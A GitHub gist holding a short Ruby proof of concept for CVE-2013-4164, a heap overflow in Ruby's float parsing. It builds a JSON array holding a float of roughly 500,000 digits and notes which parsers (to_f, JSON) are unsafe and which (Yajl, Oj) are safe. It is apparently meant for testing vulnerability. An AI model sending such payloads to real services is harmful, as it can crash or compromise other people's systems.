Skip to content

Instantly share code, notes, and snippets.

@jacopen
Last active December 29, 2015 07:29
Show Gist options
  • Save jacopen/7636018 to your computer and use it in GitHub Desktop.
Save jacopen/7636018 to your computer and use it in GitHub Desktop.
CVE-2013-4164(浮動小数点数パースにおけるヒープオーバーフロー ) https://www.ruby-lang.org/ja/news/2013/11/22/heap-overflow-in-floating-point-parsing-cve-2013-4164/
require 'yajl'
require 'json'
require 'oj'
def digit_pattern
digit_pattern ||= rand(10000).to_s
end
def integer_part
digit_pattern
end
def multiplier
(500000 * (1.0/digit_pattern.size)).to_i
end
def fractional_part
digit_pattern * multiplier
end
def evil_float_string
[integer_part,fractional_part].join('.')
end
sploit = '['
sploit << evil_float_string
sploit << ']'
#evil_float_string.to_f #UNSAFE
#JSON.parse sploit #UNSAFE
#Yajl::Parser.parse sploit #SAFE
#Oj.load sploit #SAFE
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment